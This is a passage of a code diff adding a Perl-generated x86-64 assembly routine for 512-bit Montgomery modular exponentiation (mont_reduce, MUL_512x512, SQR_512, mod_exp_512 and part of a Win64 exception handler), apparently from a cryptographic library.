+	 mov	%r9, (+8*1)(%rdi)
+	# end MUL_128x128t128
+
+	 sub	\$`$K1-$M`, %rsi
+
+	 mov	(%rcx), $X[6]
+	 mov	(+8*1)(%rcx), $X[7]			# r9:r8 = X2[1:0]
+
+	 call	MULADD_128x512			# args in rcx, rdi / rbp, rsi, r15-r8
+	# result in r9, r8, r15, r14, r13, r12, r11, r10, X2[1:0]
+
+	# load first half of m to rdx, rdi, rbx, rax
+	# moved this here for efficiency
+	 mov	(+8*0)(%rsi), %rax
+	 mov	(+8*1)(%rsi), %rbx
+	 mov	(+8*2)(%rsi), %rdi
+	 mov	(+8*3)(%rsi), %rdx
+
+	# continue with reduction
+	 mov	(+$Reduce_Data_offset+$Carries_offset+$STACK_DEPTH)(%rsp), %rbp
+
+	 add	(+8*8)(%rcx), $X[6]
+	 adc	(+8*9)(%rcx), $X[7]
+
+	#accumulate the final carry to rbp
+	 adc	%rbp, %rbp
+
+	# Add in overflow corrections: R = (X2>>128) += T[overflow]
+	# R = {r9, r8, r15, r14, ..., r10}
+	 shl	\$3, %rbp
+	 mov	(+$pData_offset+$STACK_DEPTH)(%rsp), %rcx			# rsi -> Data (and points to T)
+	 add	%rcx, %rbp			# pT ; 512 bits, 8 qwords, spread out
+
+	# rsi will be used to generate a mask after the addition
+	 xor	%rsi, %rsi
+
+	 add	(+8*8*0)(%rbp), $X[0]
+	 adc	(+8*8*1)(%rbp), $X[1]
+	 adc	(+8*8*2)(%rbp), $X[2]
+	 adc	(+8*8*3)(%rbp), $X[3]
+	 adc	(+8*8*4)(%rbp), $X[4]
+	 adc	(+8*8*5)(%rbp), $X[5]
+	 adc	(+8*8*6)(%rbp), $X[6]
+	 adc	(+8*8*7)(%rbp), $X[7]
+
+	# if there is a carry:	rsi = 0xFFFFFFFFFFFFFFFF
+	# if carry is clear:	rsi = 0x0000000000000000
+	 sbb	\$0, %rsi
+
+	# if carry is clear, subtract 0. Otherwise, subtract 256 bits of m
+	 and	%rsi, %rax
+	 and	%rsi, %rbx
+	 and	%rsi, %rdi
+	 and	%rsi, %rdx
+
+	 mov	\$1, %rbp
+	 sub	%rax, $X[0]
+	 sbb	%rbx, $X[1]
+	 sbb	%rdi, $X[2]
+	 sbb	%rdx, $X[3]
+
+	# if there is a borrow:		rbp = 0
+	# if there is no borrow:	rbp = 1
+	# this is used to save the borrows in between the first half and the 2nd half of the subtraction of m
+	 sbb	\$0, %rbp
+
+	#load second half of m to rdx, rdi, rbx, rax
+
+	 add	\$$M, %rcx
+	 mov	(+8*4)(%rcx), %rax
+	 mov	(+8*5)(%rcx), %rbx
+	 mov	(+8*6)(%rcx), %rdi
+	 mov	(+8*7)(%rcx), %rdx
+
+	# use the rsi mask as before
+	# if carry is clear, subtract 0. Otherwise, subtract 256 bits of m
+	 and	%rsi, %rax
+	 and	%rsi, %rbx
+	 and	%rsi, %rdi
+	 and	%rsi, %rdx
+
+	# if rbp = 0, there was a borrow before, it is moved to the carry flag
+	# if rbp = 1, there was not a borrow before, carry flag is cleared
+	 sub	\$1, %rbp
+
+	 sbb	%rax, $X[4]
+	 sbb	%rbx, $X[5]
+	 sbb	%rdi, $X[6]
+	 sbb	%rdx, $X[7]
+
+	# write R back to memory
+
+	 mov	(+$red_result_addr_offset+$STACK_DEPTH)(%rsp), %rsi
+	 mov	$X[0], (+8*0)(%rsi)
+	 mov	$X[1], (+8*1)(%rsi)
+	 mov	$X[2], (+8*2)(%rsi)
+	 mov	$X[3], (+8*3)(%rsi)
+	 mov	$X[4], (+8*4)(%rsi)
+	 mov	$X[5], (+8*5)(%rsi)
+	 mov	$X[6], (+8*6)(%rsi)
+	 mov	$X[7], (+8*7)(%rsi)
+
+	 ret
+.size	mont_reduce,.-mont_reduce
+___
+}}}
+
+{{{
+#MUL_512x512	MACRO	pDst, pA, pB, x7, x6, x5, x4, x3, x2, x1, x0, tmp*2
+#
+# Inputs: pDst: Destination  (1024 bits, 16 qwords)
+#         pA:   Multiplicand (512 bits, 8 qwords)
+#         pB:   Multiplicand (512 bits, 8 qwords)
+# Uses registers rax, rdx, args
+#   B operand in [pB] and also in x7...x0
+sub MUL_512x512
+{
+ my ($pDst, $pA, $pB, $x, $OP, $TMP, $pDst_o)=@_;
+ my ($pDst,  $pDst_o) = ($pDst =~ m/([^+]*)\+?(.*)?/);
+ my @X=@$x;	# make a copy
+
+$code.=<<___;
+	 mov	(+8*0)($pA), $OP
+
+	 mov	$X[0], %rax
+	 mul	$OP			# rdx:rax = %OP * [0]
+	 mov	%rax, (+$pDst_o+8*0)($pDst)
+	 mov	%rdx, $X[0]
+___
+for(my $i=1;$i<8;$i++) {
+$code.=<<___;
+	 mov	$X[$i], %rax
+	 mul	$OP			# rdx:rax = %OP * [$i]
+	 add	%rax, $X[$i-1]
+	 adc	\$0, %rdx
+	 mov	%rdx, $X[$i]
+___
+}
+
+for(my $i=1;$i<8;$i++) {
+$code.=<<___;
+	 mov	(+8*$i)($pA), $OP
+___
+
+	&MULSTEP_512(\@X, "(+$pDst_o+8*$i)($pDst)", $pB, $OP, $TMP);
+	push(@X,shift(@X));
+}
+
+$code.=<<___;
+	 mov	$X[0], (+$pDst_o+8*8)($pDst)
+	 mov	$X[1], (+$pDst_o+8*9)($pDst)
+	 mov	$X[2], (+$pDst_o+8*10)($pDst)
+	 mov	$X[3], (+$pDst_o+8*11)($pDst)
+	 mov	$X[4], (+$pDst_o+8*12)($pDst)
+	 mov	$X[5], (+$pDst_o+8*13)($pDst)
+	 mov	$X[6], (+$pDst_o+8*14)($pDst)
+	 mov	$X[7], (+$pDst_o+8*15)($pDst)
+___
+}
+
+#
+# mont_mul_a3b : subroutine to compute (Src1 * Src2) % M (all 512-bits)
+# Input:  src1: Address of source 1: rdi
+#         src2: Address of source 2: rsi
+# Output: dst:  Address of destination: [red_res_addr]
+#    src2 and result also in: r9, r8, r15, r14, r13, r12, r11, r10
+# Temp:   Clobbers [tmp16], all registers
+$code.=<<___;
+.type	mont_mul_a3b,\@abi-omnipotent
+.align	16
+mont_mul_a3b:
+	#
+	# multiply tmp = src1 * src2
+	# For multiply: dst = rcx, src1 = rdi, src2 = rsi
+	# stack depth is extra 8 from call
+___
+	&MUL_512x512("%rsp+$tmp16_offset+8", "%rdi", "%rsi", [map("%r$_",(10..15,8..9))], "%rbp", "%rbx");
+$code.=<<___;
+	#
+	# Dst = tmp % m
+	# Call reduce(tmp, m, data, dst)
+
+	# tail recursion optimization: jmp to mont_reduce and return from there
+	 jmp	mont_reduce
+	# call	mont_reduce
+	# ret
+.size	mont_mul_a3b,.-mont_mul_a3b
+___
+}}}
+
+{{{
+#SQR_512 MACRO pDest, pA, x7, x6, x5, x4, x3, x2, x1, x0, tmp*4
+#
+# Input in memory [pA] and also in x7...x0
+# Uses all argument registers plus rax and rdx
+#
+# This version computes all of the off-diagonal terms into memory,
+# and then it adds in the diagonal terms
+
+sub SQR_512
+{
+ my ($pDst, $pA, $x, $A, $tmp, $x7, $x6, $pDst_o)=@_;
+ my ($pDst,  $pDst_o) = ($pDst =~ m/([^+]*)\+?(.*)?/);
+ my @X=@$x;	# make a copy
+$code.=<<___;
+	# ------------------
+	# first pass 01...07
+	# ------------------
+	 mov	$X[0], $A
+
+	 mov	$X[1],%rax
+	 mul	$A
+	 mov	%rax, (+$pDst_o+8*1)($pDst)
+___
+for(my $i=2;$i<8;$i++) {
+$code.=<<___;
+	 mov	%rdx, $X[$i-2]
+	 mov	$X[$i],%rax
+	 mul	$A
+	 add	%rax, $X[$i-2]
+	 adc	\$0, %rdx
+___
+}
+$code.=<<___;
+	 mov	%rdx, $x7
+
+	 mov	$X[0], (+$pDst_o+8*2)($pDst)
+
+	# ------------------
+	# second pass 12...17
+	# ------------------
+
+	 mov	(+8*1)($pA), $A
+
+	 mov	(+8*2)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[1]
+	 adc	\$0, %rdx
+	 mov	$X[1], (+$pDst_o+8*3)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	(+8*3)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[2]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[2]
+	 adc	\$0, %rdx
+	 mov	$X[2], (+$pDst_o+8*4)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	(+8*4)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[3]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[3]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[0]
+	 mov	(+8*5)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[4]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[4]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[0]
+	 mov	$X[6],%rax
+	 mul	$A
+	 add	%rax, $X[5]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[5]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[0]
+	 mov	$X[7],%rax
+	 mul	$A
+	 add	%rax, $x7
+	 adc	\$0, %rdx
+	 add	$X[0], $x7
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[1]
+
+	# ------------------
+	# third pass 23...27
+	# ------------------
+	 mov	(+8*2)($pA), $A
+
+	 mov	(+8*3)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[3]
+	 adc	\$0, %rdx
+	 mov	$X[3], (+$pDst_o+8*5)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	(+8*4)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[4]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[4]
+	 adc	\$0, %rdx
+	 mov	$X[4], (+$pDst_o+8*6)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	(+8*5)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[5]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[5]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[0]
+	 mov	$X[6],%rax
+	 mul	$A
+	 add	%rax, $x7
+	 adc	\$0, %rdx
+	 add	$X[0], $x7
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[0]
+	 mov	$X[7],%rax
+	 mul	$A
+	 add	%rax, $X[1]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[1]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[2]
+
+	# ------------------
+	# fourth pass 34...37
+	# ------------------
+
+	 mov	(+8*3)($pA), $A
+
+	 mov	(+8*4)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[5]
+	 adc	\$0, %rdx
+	 mov	$X[5], (+$pDst_o+8*7)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	(+8*5)($pA),%rax
+	 mul	$A
+	 add	%rax, $x7
+	 adc	\$0, %rdx
+	 add	$X[0], $x7
+	 adc	\$0, %rdx
+	 mov	$x7, (+$pDst_o+8*8)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	$X[6],%rax
+	 mul	$A
+	 add	%rax, $X[1]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[1]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[0]
+	 mov	$X[7],%rax
+	 mul	$A
+	 add	%rax, $X[2]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[2]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[5]
+
+	# ------------------
+	# fifth pass 45...47
+	# ------------------
+	 mov	(+8*4)($pA), $A
+
+	 mov	(+8*5)($pA),%rax
+	 mul	$A
+	 add	%rax, $X[1]
+	 adc	\$0, %rdx
+	 mov	$X[1], (+$pDst_o+8*9)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	$X[6],%rax
+	 mul	$A
+	 add	%rax, $X[2]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[2]
+	 adc	\$0, %rdx
+	 mov	$X[2], (+$pDst_o+8*10)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	$X[7],%rax
+	 mul	$A
+	 add	%rax, $X[5]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[5]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $X[1]
+
+	# ------------------
+	# sixth pass 56...57
+	# ------------------
+	 mov	(+8*5)($pA), $A
+
+	 mov	$X[6],%rax
+	 mul	$A
+	 add	%rax, $X[5]
+	 adc	\$0, %rdx
+	 mov	$X[5], (+$pDst_o+8*11)($pDst)
+
+	 mov	%rdx, $X[0]
+	 mov	$X[7],%rax
+	 mul	$A
+	 add	%rax, $X[1]
+	 adc	\$0, %rdx
+	 add	$X[0], $X[1]
+	 adc	\$0, %rdx
+	 mov	$X[1], (+$pDst_o+8*12)($pDst)
+
+	 mov	%rdx, $X[2]
+
+	# ------------------
+	# seventh pass 67
+	# ------------------
+	 mov	$X[6], $A
+
+	 mov	$X[7],%rax
+	 mul	$A
+	 add	%rax, $X[2]
+	 adc	\$0, %rdx
+	 mov	$X[2], (+$pDst_o+8*13)($pDst)
+
+	 mov	%rdx, (+$pDst_o+8*14)($pDst)
+
+	# start finalize (add	in squares, and double off-terms)
+	 mov	(+$pDst_o+8*1)($pDst), $X[0]
+	 mov	(+$pDst_o+8*2)($pDst), $X[1]
+	 mov	(+$pDst_o+8*3)($pDst), $X[2]
+	 mov	(+$pDst_o+8*4)($pDst), $X[3]
+	 mov	(+$pDst_o+8*5)($pDst), $X[4]
+	 mov	(+$pDst_o+8*6)($pDst), $X[5]
+
+	 mov	(+8*3)($pA), %rax
+	 mul	%rax
+	 mov	%rax, $x6
+	 mov	%rdx, $X[6]
+
+	 add	$X[0], $X[0]
+	 adc	$X[1], $X[1]
+	 adc	$X[2], $X[2]
+	 adc	$X[3], $X[3]
+	 adc	$X[4], $X[4]
+	 adc	$X[5], $X[5]
+	 adc	\$0, $X[6]
+
+	 mov	(+8*0)($pA), %rax
+	 mul	%rax
+	 mov	%rax, (+$pDst_o+8*0)($pDst)
+	 mov	%rdx, $A
+
+	 mov	(+8*1)($pA), %rax
+	 mul	%rax
+
+	 add	$A, $X[0]
+	 adc	%rax, $X[1]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $A
+	 mov	$X[0], (+$pDst_o+8*1)($pDst)
+	 mov	$X[1], (+$pDst_o+8*2)($pDst)
+
+	 mov	(+8*2)($pA), %rax
+	 mul	%rax
+
+	 add	$A, $X[2]
+	 adc	%rax, $X[3]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $A
+
+	 mov	$X[2], (+$pDst_o+8*3)($pDst)
+	 mov	$X[3], (+$pDst_o+8*4)($pDst)
+
+	 xor	$tmp, $tmp
+	 add	$A, $X[4]
+	 adc	$x6, $X[5]
+	 adc	\$0, $tmp
+
+	 mov	$X[4], (+$pDst_o+8*5)($pDst)
+	 mov	$X[5], (+$pDst_o+8*6)($pDst)
+
+	# %%tmp has 0/1 in column 7
+	# %%A6 has a full value in column 7
+
+	 mov	(+$pDst_o+8*7)($pDst), $X[0]
+	 mov	(+$pDst_o+8*8)($pDst), $X[1]
+	 mov	(+$pDst_o+8*9)($pDst), $X[2]
+	 mov	(+$pDst_o+8*10)($pDst), $X[3]
+	 mov	(+$pDst_o+8*11)($pDst), $X[4]
+	 mov	(+$pDst_o+8*12)($pDst), $X[5]
+	 mov	(+$pDst_o+8*13)($pDst), $x6
+	 mov	(+$pDst_o+8*14)($pDst), $x7
+
+	 mov	$X[7], %rax
+	 mul	%rax
+	 mov	%rax, $X[7]
+	 mov	%rdx, $A
+
+	 add	$X[0], $X[0]
+	 adc	$X[1], $X[1]
+	 adc	$X[2], $X[2]
+	 adc	$X[3], $X[3]
+	 adc	$X[4], $X[4]
+	 adc	$X[5], $X[5]
+	 adc	$x6, $x6
+	 adc	$x7, $x7
+	 adc	\$0, $A
+
+	 add	$tmp, $X[0]
+
+	 mov	(+8*4)($pA), %rax
+	 mul	%rax
+
+	 add	$X[6], $X[0]
+	 adc	%rax, $X[1]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $tmp
+
+	 mov	$X[0], (+$pDst_o+8*7)($pDst)
+	 mov	$X[1], (+$pDst_o+8*8)($pDst)
+
+	 mov	(+8*5)($pA), %rax
+	 mul	%rax
+
+	 add	$tmp, $X[2]
+	 adc	%rax, $X[3]
+	 adc	\$0, %rdx
+
+	 mov	%rdx, $tmp
+
+	 mov	$X[2], (+$pDst_o+8*9)($pDst)
+	 mov	$X[3], (+$pDst_o+8*10)($pDst)
+
+	 mov	(+8*6)($pA), %rax
+	 mul	%rax
+
+	 add	$tmp, $X[4]
+	 adc	%rax, $X[5]
+	 adc	\$0, %rdx
+
+	 mov	$X[4], (+$pDst_o+8*11)($pDst)
+	 mov	$X[5], (+$pDst_o+8*12)($pDst)
+
+	 add	%rdx, $x6
+	 adc	$X[7], $x7
+	 adc	\$0, $A
+
+	 mov	$x6, (+$pDst_o+8*13)($pDst)
+	 mov	$x7, (+$pDst_o+8*14)($pDst)
+	 mov	$A, (+$pDst_o+8*15)($pDst)
+___
+}
+
+#
+# sqr_reduce: subroutine to compute Result = reduce(Result * Result)
+#
+# input and result also in: r9, r8, r15, r14, r13, r12, r11, r10
+#
+$code.=<<___;
+.type	sqr_reduce,\@abi-omnipotent
+.align	16
+sqr_reduce:
+	 mov	(+$pResult_offset+8)(%rsp), %rcx
+___
+	&SQR_512("%rsp+$tmp16_offset+8", "%rcx", [map("%r$_",(10..15,8..9))], "%rbx", "%rbp", "%rsi", "%rdi");
+$code.=<<___;
+	# tail recursion optimization: jmp to mont_reduce and return from there
+	 jmp	mont_reduce
+	# call	mont_reduce
+	# ret
+.size	sqr_reduce,.-sqr_reduce
+___
+}}}
+
+#
+# MAIN FUNCTION
+#
+
+#mod_exp_512(UINT64 *result, /* 512 bits, 8 qwords */
+#           UINT64 *g,   /* 512 bits, 8 qwords */
+#           UINT64 *exp, /* 512 bits, 8 qwords */
+#           struct mod_ctx_512 *data)
+
+# window size = 5
+# table size = 2^5 = 32
+#table_entries	equ	32
+#table_size	equ	table_entries * 8
+$code.=<<___;
+.globl	mod_exp_512
+.type	mod_exp_512,\@function,4
+mod_exp_512:
+	 push	%rbp
+	 push	%rbx
+	 push	%r12
+	 push	%r13
+	 push	%r14
+	 push	%r15
+
+	# adjust stack down and then align it with cache boundary
+	 mov	%rsp, %r8
+	 sub	\$$mem_size, %rsp
+	 and	\$-64, %rsp
+
+	# store previous stack pointer and arguments
+	 mov	%r8, (+$rsp_offset)(%rsp)
+	 mov	%rdi, (+$pResult_offset)(%rsp)
+	 mov	%rsi, (+$pG_offset)(%rsp)
+	 mov	%rcx, (+$pData_offset)(%rsp)
+.Lbody:
+	# transform g into montgomery space
+	# GT = reduce(g * C2) = reduce(g * (2^256))
+	# reduce expects to have the input in [tmp16]
+	 pxor	%xmm4, %xmm4
+	 movdqu	(+16*0)(%rsi), %xmm0
+	 movdqu	(+16*1)(%rsi), %xmm1
+	 movdqu	(+16*2)(%rsi), %xmm2
+	 movdqu	(+16*3)(%rsi), %xmm3
+	 movdqa	%xmm4, (+$tmp16_offset+16*0)(%rsp)
+	 movdqa	%xmm4, (+$tmp16_offset+16*1)(%rsp)
+	 movdqa	%xmm4, (+$tmp16_offset+16*6)(%rsp)
+	 movdqa	%xmm4, (+$tmp16_offset+16*7)(%rsp)
+	 movdqa	%xmm0, (+$tmp16_offset+16*2)(%rsp)
+	 movdqa	%xmm1, (+$tmp16_offset+16*3)(%rsp)
+	 movdqa	%xmm2, (+$tmp16_offset+16*4)(%rsp)
+	 movdqa	%xmm3, (+$tmp16_offset+16*5)(%rsp)
+
+	# load pExp before rdx gets blown away
+	 movdqu	(+16*0)(%rdx), %xmm0
+	 movdqu	(+16*1)(%rdx), %xmm1
+	 movdqu	(+16*2)(%rdx), %xmm2
+	 movdqu	(+16*3)(%rdx), %xmm3
+
+	 lea	(+$GT_offset)(%rsp), %rbx
+	 mov	%rbx, (+$red_result_addr_offset)(%rsp)
+	 call	mont_reduce
+
+	# Initialize tmp = C
+	 lea	(+$tmp_offset)(%rsp), %rcx
+	 xor	%rax, %rax
+	 mov	%rax, (+8*0)(%rcx)
+	 mov	%rax, (+8*1)(%rcx)
+	 mov	%rax, (+8*3)(%rcx)
+	 mov	%rax, (+8*4)(%rcx)
+	 mov	%rax, (+8*5)(%rcx)
+	 mov	%rax, (+8*6)(%rcx)
+	 mov	%rax, (+8*7)(%rcx)
+	 mov	%rax, (+$exp_offset+8*8)(%rsp)
+	 movq	\$1, (+8*2)(%rcx)
+
+	 lea	(+$garray_offset)(%rsp), %rbp
+	 mov	%rcx, %rsi			# pTmp
+	 mov	%rbp, %rdi			# Garray[][0]
+___
+
+	&swizzle("%rdi", "%rcx", "%rax", "%rbx");
+
+	# for (rax = 31; rax != 0; rax--) {
+	#     tmp = reduce(tmp * G)
+	#     swizzle(pg, tmp);
+	#     pg += 2; }
+$code.=<<___;
+	 mov	\$31, %rax
+	 mov	%rax, (+$i_offset)(%rsp)
+	 mov	%rbp, (+$pg_offset)(%rsp)
+	# rsi -> pTmp
+	 mov	%rsi, (+$red_result_addr_offset)(%rsp)
+	 mov	(+8*0)(%rsi), %r10
+	 mov	(+8*1)(%rsi), %r11
+	 mov	(+8*2)(%rsi), %r12
+	 mov	(+8*3)(%rsi), %r13
+	 mov	(+8*4)(%rsi), %r14
+	 mov	(+8*5)(%rsi), %r15
+	 mov	(+8*6)(%rsi), %r8
+	 mov	(+8*7)(%rsi), %r9
+init_loop:
+	 lea	(+$GT_offset)(%rsp), %rdi
+	 call	mont_mul_a3b
+	 lea	(+$tmp_offset)(%rsp), %rsi
+	 mov	(+$pg_offset)(%rsp), %rbp
+	 add	\$2, %rbp
+	 mov	%rbp, (+$pg_offset)(%rsp)
+	 mov	%rsi, %rcx			# rcx = rsi = addr of tmp
+___
+
+	&swizzle("%rbp", "%rcx", "%rax", "%rbx");
+$code.=<<___;
+	 mov	(+$i_offset)(%rsp), %rax
+	 sub	\$1, %rax
+	 mov	%rax, (+$i_offset)(%rsp)
+	 jne	init_loop
+
+	#
+	# Copy exponent onto stack
+	 movdqa	%xmm0, (+$exp_offset+16*0)(%rsp)
+	 movdqa	%xmm1, (+$exp_offset+16*1)(%rsp)
+	 movdqa	%xmm2, (+$exp_offset+16*2)(%rsp)
+	 movdqa	%xmm3, (+$exp_offset+16*3)(%rsp)
+
+
+	#
+	# Do exponentiation
+	# Initialize result to G[exp{511:507}]
+	 mov	(+$exp_offset+62)(%rsp), %eax
+	 mov	%rax, %rdx
+	 shr	\$11, %rax
+	 and	\$0x07FF, %edx
+	 mov	%edx, (+$exp_offset+62)(%rsp)
+	 lea	(+$garray_offset)(%rsp,%rax,2), %rsi
+	 mov	(+$pResult_offset)(%rsp), %rdx
+___
+
+	&unswizzle("%rdx", "%rsi", "%rbp", "%rbx", "%rax");
+
+	#
+	# Loop variables
+	# rcx = [loop_idx] = index: 510-5 to 0 by 5
+$code.=<<___;
+	 movq	\$505, (+$loop_idx_offset)(%rsp)
+
+	 mov	(+$pResult_offset)(%rsp), %rcx
+	 mov	%rcx, (+$red_result_addr_offset)(%rsp)
+	 mov	(+8*0)(%rcx), %r10
+	 mov	(+8*1)(%rcx), %r11
+	 mov	(+8*2)(%rcx), %r12
+	 mov	(+8*3)(%rcx), %r13
+	 mov	(+8*4)(%rcx), %r14
+	 mov	(+8*5)(%rcx), %r15
+	 mov	(+8*6)(%rcx), %r8
+	 mov	(+8*7)(%rcx), %r9
+	 jmp	sqr_2
+
+main_loop_a3b:
+	 call	sqr_reduce
+	 call	sqr_reduce
+	 call	sqr_reduce
+sqr_2:
+	 call	sqr_reduce
+	 call	sqr_reduce
+
+	#
+	# Do multiply, first look up proper value in Garray
+	 mov	(+$loop_idx_offset)(%rsp), %rcx			# bit index
+	 mov	%rcx, %rax
+	 shr	\$4, %rax			# rax is word pointer
+	 mov	(+$exp_offset)(%rsp,%rax,2), %edx
+	 and	\$15, %rcx
+	 shrq	%cl, %rdx
+	 and	\$0x1F, %rdx
+
+	 lea	(+$garray_offset)(%rsp,%rdx,2), %rsi
+	 lea	(+$tmp_offset)(%rsp), %rdx
+	 mov	%rdx, %rdi
+___
+
+	&unswizzle("%rdx", "%rsi", "%rbp", "%rbx", "%rax");
+	# rdi = tmp = pG
+
+	#
+	# Call mod_mul_a1(pDst,  pSrc1, pSrc2, pM, pData)
+	#                 result result pG     M   Data
+$code.=<<___;
+	 mov	(+$pResult_offset)(%rsp), %rsi
+	 call	mont_mul_a3b
+
+	#
+	# finish loop
+	 mov	(+$loop_idx_offset)(%rsp), %rcx
+	 sub	\$5, %rcx
+	 mov	%rcx, (+$loop_idx_offset)(%rsp)
+	 jge	main_loop_a3b
+
+	#
+
+end_main_loop_a3b:
+	# transform result out of Montgomery space
+	# result = reduce(result)
+	 mov	(+$pResult_offset)(%rsp), %rdx
+	 pxor	%xmm4, %xmm4
+	 movdqu	(+16*0)(%rdx), %xmm0
+	 movdqu	(+16*1)(%rdx), %xmm1
+	 movdqu	(+16*2)(%rdx), %xmm2
+	 movdqu	(+16*3)(%rdx), %xmm3
+	 movdqa	%xmm4, (+$tmp16_offset+16*4)(%rsp)
+	 movdqa	%xmm4, (+$tmp16_offset+16*5)(%rsp)
+	 movdqa	%xmm4, (+$tmp16_offset+16*6)(%rsp)
+	 movdqa	%xmm4, (+$tmp16_offset+16*7)(%rsp)
+	 movdqa	%xmm0, (+$tmp16_offset+16*0)(%rsp)
+	 movdqa	%xmm1, (+$tmp16_offset+16*1)(%rsp)
+	 movdqa	%xmm2, (+$tmp16_offset+16*2)(%rsp)
+	 movdqa	%xmm3, (+$tmp16_offset+16*3)(%rsp)
+	 call	mont_reduce
+
+	# If result > m, subract m
+	# load result into r15:r8
+	 mov	(+$pResult_offset)(%rsp), %rax
+	 mov	(+8*0)(%rax), %r8
+	 mov	(+8*1)(%rax), %r9
+	 mov	(+8*2)(%rax), %r10
+	 mov	(+8*3)(%rax), %r11
+	 mov	(+8*4)(%rax), %r12
+	 mov	(+8*5)(%rax), %r13
+	 mov	(+8*6)(%rax), %r14
+	 mov	(+8*7)(%rax), %r15
+
+	# subtract m
+	 mov	(+$pData_offset)(%rsp), %rbx
+	 add	\$$M, %rbx
+
+	 sub	(+8*0)(%rbx), %r8
+	 sbb	(+8*1)(%rbx), %r9
+	 sbb	(+8*2)(%rbx), %r10
+	 sbb	(+8*3)(%rbx), %r11
+	 sbb	(+8*4)(%rbx), %r12
+	 sbb	(+8*5)(%rbx), %r13
+	 sbb	(+8*6)(%rbx), %r14
+	 sbb	(+8*7)(%rbx), %r15
+
+	# if Carry is clear, replace result with difference
+	 mov	(+8*0)(%rax), %rsi
+	 mov	(+8*1)(%rax), %rdi
+	 mov	(+8*2)(%rax), %rcx
+	 mov	(+8*3)(%rax), %rdx
+	 cmovnc	%r8, %rsi
+	 cmovnc	%r9, %rdi
+	 cmovnc	%r10, %rcx
+	 cmovnc	%r11, %rdx
+	 mov	%rsi, (+8*0)(%rax)
+	 mov	%rdi, (+8*1)(%rax)
+	 mov	%rcx, (+8*2)(%rax)
+	 mov	%rdx, (+8*3)(%rax)
+
+	 mov	(+8*4)(%rax), %rsi
+	 mov	(+8*5)(%rax), %rdi
+	 mov	(+8*6)(%rax), %rcx
+	 mov	(+8*7)(%rax), %rdx
+	 cmovnc	%r12, %rsi
+	 cmovnc	%r13, %rdi
+	 cmovnc	%r14, %rcx
+	 cmovnc	%r15, %rdx
+	 mov	%rsi, (+8*4)(%rax)
+	 mov	%rdi, (+8*5)(%rax)
+	 mov	%rcx, (+8*6)(%rax)
+	 mov	%rdx, (+8*7)(%rax)
+
+	 mov	(+$rsp_offset)(%rsp), %rsi
+	 mov	0(%rsi),%r15
+	 mov	8(%rsi),%r14
+	 mov	16(%rsi),%r13
+	 mov	24(%rsi),%r12
+	 mov	32(%rsi),%rbx
+	 mov	40(%rsi),%rbp
+	 lea	48(%rsi),%rsp
+.Lepilogue:
+	 ret
+.size mod_exp_512, . - mod_exp_512
+___
+
+if ($win64) {
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+my $rec="%rcx";
+my $frame="%rdx";
+my $context="%r8";
+my $disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	mod_exp_512_se_handler,\@abi-omnipotent
+.align	16
+mod_exp_512_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lbody(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lepilogue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	mov	$rsp_offset(%rax),%rax	# pull saved Rsp
+
+	mov	32(%rax),%rbx
+	mov	40(%rax),%rbp
+	mov	24(%rax),%r12
+	mov	16(%rax),%r13
+	mov	8(%rax),%r14
+	mov	0(%rax),%r15
+	lea	48(%rax),%rax
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
